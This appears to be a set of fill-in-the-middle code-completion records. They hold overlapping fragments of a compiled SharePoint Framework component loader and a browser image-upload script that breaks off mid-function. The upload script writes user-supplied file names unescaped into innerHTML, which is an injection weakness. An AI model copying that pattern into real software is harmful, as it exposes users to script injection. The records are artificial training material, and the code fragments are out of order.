var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else |
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
} | conditional_block |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function SPComponentLoader(loaderArgs) |
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
} | identifier_body |
SPComponentLoader.js | import { _QosMonitor } from '@ms/sp-telemetry';
import { DebugManager } from '../../debug/DebugManager';
import ComponentStore from '../../stores/ComponentStore';
import ManifestStore from '../../stores/ManifestStore';
import { react16Version, reactComponentId, reactDomComponentId } from '../../utilities/componentConstants';
import { loadComponentQosScenarioName } from '../../utilities/telemetryConstants';
import { isDangerouslyEnableDebugKSActivated, isSkipFirstPartyLoaderLogKillswtichActivated, isDisable3PCodeKillswitchActivated, isOptimsticPreloadFilteredToViewPortKillswitchActivated } from '../common/killSwitches';
import { normalizeComponentId } from '../common/normalize';
import { startApplication } from '../common/platformLoader';
/**
* SPFx component loader.
*
* @public
*/
var SPComponentLoader = /** @class */ (function () {
function | (loaderArgs) {
var bundledComponents = loaderArgs.bundledComponents, ctor = loaderArgs.ctor, _a = loaderArgs.debugData, debugLoader = _a.debugLoader, debugManifests = _a.debugManifests, registerAsNonDebug = _a.registerAsNonDebug, preloadedData = loaderArgs.preloadedData, serviceScope = loaderArgs.serviceScope, useSecondaryCdn = loaderArgs.useSecondaryCdn;
this._serviceScope = serviceScope;
if (useSecondaryCdn) {
// _TraceLogger.logError
}
// Let's see if we should stop here. In order to facilitate easier diagnosis of
// customer issues - and in particular custom code messing with common
// functionality, we make it possible to disable all 3rd party code by using
// the query string ?disable3PCode
if (!isDisable3PCodeKillswitchActivated()) {
var urlParams = new URLSearchParams(window.location.search);
this._skipThirdPartyCode = urlParams.has('disable3PCode');
}
else {
this._skipThirdPartyCode = false;
}
this._loader = new ctor(this._serviceScope, useSecondaryCdn);
SPComponentLoader._headElement = document === null || document === void 0 ? void 0 : document.getElementsByTagName('head')[0];
ManifestStore.instance.registerPreloadedManifests(preloadedData);
if (debugManifests) {
if (!registerAsNonDebug && !isDangerouslyEnableDebugKSActivated()) {
ManifestStore.instance.registerDebugManifests(debugManifests);
}
else {
ManifestStore.instance.registerManifests(debugManifests, registerAsNonDebug);
}
}
var monitor = new _QosMonitor('SPComponentLoader.pinnedManifests');
var pinnedManifests = [];
// Pin and store bundled components in the assembly
for (var _i = 0, _b = Object.keys(bundledComponents); _i < _b.length; _i++) {
var id = _b[_i];
var version = id === reactComponentId || id === reactDomComponentId ? react16Version : undefined;
var shouldPin = !debugLoader && !version;
// Only pin with the production loader to allow debug manifests to be loaded
// We don't pin react or react-dom since components can bring in different versions
if (shouldPin) {
ManifestStore.instance._pinManifest(id);
}
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
var component = bundledComponents[id];
var cid = normalizeComponentId(manifest.id, manifest.version);
if (shouldPin) {
pinnedManifests.push(cid);
}
this._loader.ensure(cid, component);
ComponentStore.instance.storeLoadedComponent(manifest.id, manifest.version, component);
}
}
monitor.writeSuccess({ pinnedManifests: pinnedManifests });
}
/**
* {@inheritDoc ISPComponentLoader.loadComponent}
*/
SPComponentLoader.prototype.loadComponent = function (manifest) {
var monitor;
var extraData;
if (!manifest.isInternal && this._skipThirdPartyCode) {
// Return an indefinitely pending promise to avoid loading the code and error handling
return new Promise(function () { }); // tslint:disable-line:no-empty
}
if (isSkipFirstPartyLoaderLogKillswtichActivated() || !manifest.isInternal) {
monitor = new _QosMonitor(loadComponentQosScenarioName);
extraData = {
alias: manifest.alias,
isDebug: manifest._isDebug,
isInternal: manifest.isInternal,
manifestId: manifest.id,
version: manifest.version
};
}
return this._loader
.loadComponent(manifest)
.then(function (c) {
if (monitor) {
monitor.writeSuccess(extraData);
}
return c;
})
.catch(function (e) {
if (monitor) {
monitor.writeUnexpectedFailure(undefined, undefined, e);
}
throw e.systemjsError || e.requirejsError || e;
});
};
/**
* {@inheritDoc ISPComponentLoader.loadComponentById}
*
* @public
*/
SPComponentLoader.prototype.loadComponentById = function (id, version) {
var _this = this;
var manifest = ManifestStore.instance.tryGetManifest(id, version);
if (manifest) {
return this.loadComponent(manifest);
}
else {
return ManifestStore.instance.requestManifest(id, version).then(function (m) { return _this.loadComponent(m); });
}
};
/**
* {@inheritDoc ISPComponentLoader.loadCss}
*/
SPComponentLoader.prototype.loadCss = function (url) {
var link = document.createElement('link');
link.rel = 'stylesheet';
link.type = 'text/css';
link.href = url;
SPComponentLoader._headElement.appendChild(link);
};
/**
* {@inheritDoc ISPComponentLoader.loadScript}
*/
SPComponentLoader.prototype.loadScript = function (url, options) {
var monitor = new _QosMonitor('TinySPComponentLoader.loadScript');
return this._loader
.loadScript(url, options)
.then(function (m) {
monitor.writeSuccess();
return m;
})
.catch(function (e) {
monitor.writeUnexpectedFailure(undefined, e);
throw e;
});
};
/**
* {@inheritdoc ISPComponentLoader._loadDebugManifestsForWorkbench}
*
* @internal
*/
SPComponentLoader.prototype._loadDebugManifestsForWorkbench = function (manifestsFileUrl) {
return DebugManager.loadAndRegisterManifestsFile(this, manifestsFileUrl, true);
};
/**
* {@inheritdoc ISPComponentLoader._startApplication}
*
* @internal
*/
SPComponentLoader.prototype._startApplication = function (preloadedData) {
return startApplication(preloadedData, this._serviceScope).then(function (app) {
/*
* Normally non-SPFx environments locate their SPFx host application via a window variable
* that our startup code assigns like this:
*
* global.moduleLoaderPromise = global.spModuleLoader.start(spClientSidePageContext, handleFailure)
*
* However, in the case of the modern ListView, the "listview-spfx-host" loads after the main scripts,
* which creates a race condition where window.moduleLoaderPromise sometimes might not be assigned yet
* when their code tries to read it. In that situation, they can register a callback like this:
*
* if (window['moduleLoaderPromise']) {
* window['moduleLoaderPromise'].then((application) => {
* doSomething(application);
* });
* } else {
* window['_spLoaderCallback'] = function(application) {
* doSomething(application);
* };
* }
*/
/* tslint:disable:no-string-literal */
if (window['_spLoaderCallback']) {
var _spLoaderCallback = window['_spLoaderCallback']; // tslint:disable-line:no-any
_spLoaderCallback(app);
}
/* tslint:enable:no-string-literal */
return app;
});
};
/**
* {@inheritdoc ISPComponentLoader._preloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._preloadComponents = function () {
var _this = this;
if (!isOptimsticPreloadFilteredToViewPortKillswitchActivated() && document && document.head) {
var attributeName = 'data-sp-componentId';
var preloadElements = document.head.querySelectorAll("link[rel=preload][" + attributeName + "],script[" + attributeName + "]");
var preloadedIdSet = new Set();
for (var i = 0; i < preloadElements.length; i++) {
var componentId = preloadElements[i].getAttribute(attributeName);
if (componentId && !preloadedIdSet.has(componentId)) {
preloadedIdSet.add(componentId);
}
}
preloadedIdSet.forEach(function (id) {
var manifest = _this.tryGetManifestById(id);
if (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
}
});
}
else {
ManifestStore.instance.getRegisteredManifests(true).forEach(function (manifest) {
// We don't need to care if these succeed or fail here, and are just focused on starting the load.
_this.loadComponent(manifest); // tslint:disable-line:no-floating-promises
});
}
};
/**
* {@inheritdoc ISPComponentLoader._unloadComponents}
*
* @internal
*/
SPComponentLoader.prototype._unloadComponents = function () {
for (var _i = 0, _a = ManifestStore.instance.getRegisteredManifests(); _i < _a.length; _i++) {
var m = _a[_i];
ComponentStore.instance.deleteComponent(m.id, m.version);
this._loader.delete(m);
}
};
// #region Candidates for deletion
SPComponentLoader.prototype.registerManifests = function (manifests) {
ManifestStore.instance.registerManifests(manifests, false);
};
SPComponentLoader.prototype.requestManifest = function (id, version) {
return ManifestStore.instance.requestManifest(id, version);
};
SPComponentLoader.prototype.tryGetLoadedComponent = function (manifest) {
return ComponentStore.instance.tryGetComponentReference(manifest.id, manifest.version);
};
SPComponentLoader.prototype.tryGetManifestById = function (id, version) {
return ManifestStore.instance.tryGetManifest(id, version);
};
Object.defineProperty(SPComponentLoader.prototype, "_manifestReferences", {
get: function () {
return ManifestStore.instance.getRegisteredManifests();
},
enumerable: false,
configurable: true
});
SPComponentLoader.prototype._initialize = function (preloadedData, bundledComponents, debugData) {
/* no-op*/
};
return SPComponentLoader;
}());
export { SPComponentLoader };
//# sourceMappingURL=SPComponentLoader.js.map | SPComponentLoader | identifier_name |
imageUploader.js | var resizedImages = []; // array to hold resized photo files - used by evaluateAndResize()
var photoCounter = 1; // counter for multiple images - used by evaluateAndResize()
var uploadBtnClasses = document.getElementById('btn_upload_photos').classList; // called multiple places
var deletePhotos = []; // array to hold names of uploaded photos marked for deletion
// Compare uploaded image file signature against known MIME types
// Add more from: http://en.wikipedia.org/wiki/List_of_file_signatures
function evaluateFileSignature(headerString) {
switch (headerString) {
case "89504e47":
type = "image/png";
break;
case "47494638":
type = "image/gif";
break;
case "ffd8ffe0":
case "ffd8ffe1":
case "ffd8ffe2":
type = "image/jpeg";
break;
default:
type = "unknown";
break;
}
return type;
}
// Instantiate fileReader object, collect file signature and retrieve MIME type
function getMimeType(file, callback) {
var fileReader = new FileReader(); // instantiate new FileReader object
fileReader.onloadend = function(e) { // after file is loaded...
var arr = (new Uint8Array(e.target.result)).subarray(0, 4); // get file signature
var header = ""; // tranlsate file signature from decimal to hex for easier comparison
for(var i = 0; i < arr.length; i++) { header += arr[i].toString(16); }
var mimeType = evaluateFileSignature(header);
callback(mimeType); // retrieve mimeType for evaluation via evaluateMimeType()
};
fileReader.readAsArrayBuffer(file); // asynchronous function call
}
// Output uploaded image as a resized (semi) base64-encoded image string
function resizeImage(url, callback) {
var img = new Image;
var canvas = document.createElement("canvas");
var ctx=canvas.getContext("2d");
var cw=canvas.width;
var ch=canvas.height;
var maxW=250; // limit the image to 250x250 maximum size
var maxH=750;
img.onload = function() {
var iw=img.width;
var ih=img.height;
var scale=Math.min((maxW/iw),(maxH/ih));
var iwScaled=iw*scale;
var ihScaled=ih*scale;
canvas.width=iwScaled;
canvas.height=ihScaled;
ctx.drawImage(img,0,0,iwScaled,ihScaled);
resized = canvas.toDataURL(); // converted image as base64-encoded string
callback(resized);
}
img.src = url
}
// Convert base64 string to blob for image preview & file operations
function b64toBlob(b64Data, contentType, sliceSize) {
var contentType = contentType || '';
var sliceSize = sliceSize || 512;
var byteCharacters = atob(b64Data);
var byteArrays = [];
for (var offset = 0; offset < byteCharacters.length; offset += sliceSize) {
var slice = byteCharacters.slice(offset, offset + sliceSize);
var byteNumbers = new Array(slice.length);
for (var i = 0; i < slice.length; i++) {
byteNumbers[i] = slice.charCodeAt(i);
}
var byteArray = new Uint8Array(byteNumbers);
byteArrays.push(byteArray);
}
var blob = new Blob(byteArrays, {type: contentType});
return blob;
}
// Delete photo <td> element and corresponding object from resizedImages array
function deletePhoto(td) {
// remove <td> element from table row
var row = document.getElementById("more-photos");
for (var i = 0; i < row.children.length; i++) {
if (row.children[i] === td) { row.deleteCell(i); }
}
// remove photo from resizedImages array
var selectedPhoto = td.children[0].id;
for (var j = 0; j < resizedImages.length; j++ ) {
if (resizedImages[j].filename === selectedPhoto) { delete resizedImages[j]; }
}
// filter undefined element from array if photo element deleted
resizedImages = resizedImages.filter(function(k) { return k != undefined });
// hide Upload button and remove message if last photo element deleted
if ($("#photo_table tr td").length === 0) {
uploadBtnClasses.add('btnHide');
document.getElementById('hide_upload_status').style.display = "none";
}
}
// Adjust div size after image file loads - line 170: onload="resizeDiv()"
function resizeDiv() {
var panel = document.getElementById("imgUploaderPanel");
panel.style.maxHeight = panel.scrollHeight + "px"; // recalculate height
}
// Validate, resize, encode and preview image file
function evaluateAndResize(file) {
var fileName = file["name"].slice(0, -4) + ".png"; // image name to use with blob (resized output = PNG)
// determine file signature via magic numbers
getMimeType(file, evaluateMimeType); // fire off MIME type retrieval (asynchronous)
// callback function called in getMimeType() to evaluate mimeType for uploaded file
function evaluateMimeType(mimeType) {
if (mimeType === "unknown") {
alert("Invalid file type - please load a valid image file.");
} else {
url = URL.createObjectURL(file); // create Object URL for resizing photo
resizeImage(url, getBase64StringMulti); // fire off base64-encoded image string retrieval (asynchronous)
// callback function called in resizeImage() to get resized base64-encoded image string and output to div
function getBase64StringMulti(resized) {
var stringDataTypeFull = resized.split(';')[0];
var stringDataType = stringDataTypeFull.split(':')[1]; // get data type for blob conversion
var stringBase64 = resized.split(',')[1]; // get base64 string for blob conversion - iVBORw0KGgoAAAA...
var blob = b64toBlob(stringBase64, stringDataType); // encode base64 string as blob for preview & file ops
var blobUrl = URL.createObjectURL(blob); // create Object URL for image preview of resized image
img = document.createElement("img"); // use resized image (blobUrl) for image preview
img.src = blobUrl;
document.getElementById(fileName).src = blobUrl;
resizedImages.push({filename: fileName, data: resized}); // push photo filename & data to array
}
}
}
var imgRowDiv = document.getElementById("more-photos");
// append img to more-photos td element if not already added (line 18 in photo_upload.erb)
if (!imgRowDiv.innerHTML.includes(fileName)) {
imgRowDiv.innerHTML += '<td class="img-container" onclick="deletePhoto(this)">\
<img img src="" class="target-img" id=' + fileName + ' onload="resizeDiv()">\
<div class="overlay">\
<div class="nonEditorButton">Remove</div>\
</div>\
</td>';
}
// show Upload button and display message
if ($("#photo_table tr td").length > 0) {
uploadBtnClasses.remove('btnHide');
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("Select a photo to remove it from the list.").show();
}
photoCounter += 1;
}
// Iterate through photos object and pass each photo to evaluateAndResize()
function processFileList() {
var input = document.querySelector("#photos");
var files = input.files;
for (i = 0; i < files.length; i++) {
evaluateAndResize(files[i]);
}
}
// POST filename and data for all photos in resizedImages array when Upload button is clicked
$("#btn_upload_photos").on("click", function() {
var width = 0; // initialize width of progress bar (outside progress_bar() so persistent)
var progress = 0; // initialize progress (% of photos uploaded)
// remove "Select a photo..." message
if ($("#upload_status").text() === "Select a photo to remove it from the list.") {
document.getElementById('hide_upload_status').style.display = "none";
}
// Message if Upload button is clicked and no photos were selected
if (resizedImages.length === 0) {
document.getElementById('hide_upload_status').style.display = "inline";
$("#upload_status").text("You didn't upload any photos - please try again.").show();
}
// Changes after uploads have completed
function uploadStatus(length) {
if (length > 0) {
document.getElementById('hide_upload_status').style.display = "inline";
// find all img elements in more-photos tr and remove target-img class
var img = $("#more-photos").find("img");
img.removeClass("target-img");
img.addClass("uploaded-img");
// remove onclick function and overlay divs
var cells = $("#more-photos").find("td");
for (var i = 0; i < cells.length; i++) |
// message with photo upload status
$("#upload_status").html("Your photos have successfully uploaded.<br>Please note that it will take a moment to process them.").show();
updateButtons();
}
}
// POST the photo name and data to /queue_photos route via an AJAX request
function queuePhotos(file, index, length) {
$.ajax({
url: "/queue_photos",
type: 'POST',
data: {filename: file.filename, data: file.data},
success: function(data, status, xhr) {},
complete: function(data, status, xhr) {
if (index + 1 === length) { // if this is the last photo
uploadPhotos();
}
}
});
}
// Trigger /upload_photos route to start processing photo data from photo queue
function uploadPhotos() {
$.ajax({
url: "/upload_photos",
type: 'POST',
data: {photoUploadStatus: "OK"},
success: function(data, status, xhr) {}
});
}
// Incrementally draw a progress bar based on photo upload completion
function photoProgressBar(progress, length) {
var elem = document.getElementById("photo_progress");
var speed = 20 * length; // integer determines speed of progress bar draw
var id = setInterval(frame, speed);
function frame() {
if (width >= progress) {
clearInterval(id);
} else {
width++;
elem.style.width = width + '%';
elem.innerHTML = width * 1 + '%';
if (width === 100) {
uploadStatus(length); // message once all photos uploaded
}
}
}
}
// Sets display style for photo progress bar div so it is visible
function showPhotoProgress() {
document.getElementById('hide_ajax_progress').style.display = "inline";
}
// Hide Upload button and show Upload More Photos and Return Home buttons after clicking Upload button
function updateButtons() {
var uploadMoreBtnClasses = document.getElementById('btn_more_photos').classList;
if (uploadMoreBtnClasses.contains('btnHide')) {
uploadBtnClasses.add('btnHide');
uploadMoreBtnClasses.remove('btnHide');
}
}
// Iterate through the resizedImages array and queue each photo via AJAX request
$("#ajax_write").submit(function(event) {
event.preventDefault(); // suppress the default behavior for the form submit button
$.each(resizedImages, function(index, file) {
var length = resizedImages.length;
queuePhotos(file, index, length); // AJAX request to queue photo
progress = (index + 1) * 100 / length; // percentage of image upload completion (integer)
showPhotoProgress();
photoProgressBar(progress, length);
});
// Hide the Select Photo button after clicking Upload if there are any photos
if ($("#photo_table tr td").length > 0) {
document.getElementById('select_photo_button').style.display = "none";
}
resizedImages = []; // flush the array
photoCounter = 1; // reset the counter
});
});
// Hide "You didn't upload any photos..." message if it is showing after clicking Select Photo button
$("#photos").on("click", function() {
var uploadMsg = document.getElementById('hide_upload_status').style.display;
if (uploadMsg === "inline" && $("#upload_status").text() !== "Select a photo to remove it from the list.") {
document.getElementById('upload_status').style.display = "none";
}
});
// Add photo to deletePhotos array when selected
function selectPhoto(td) {
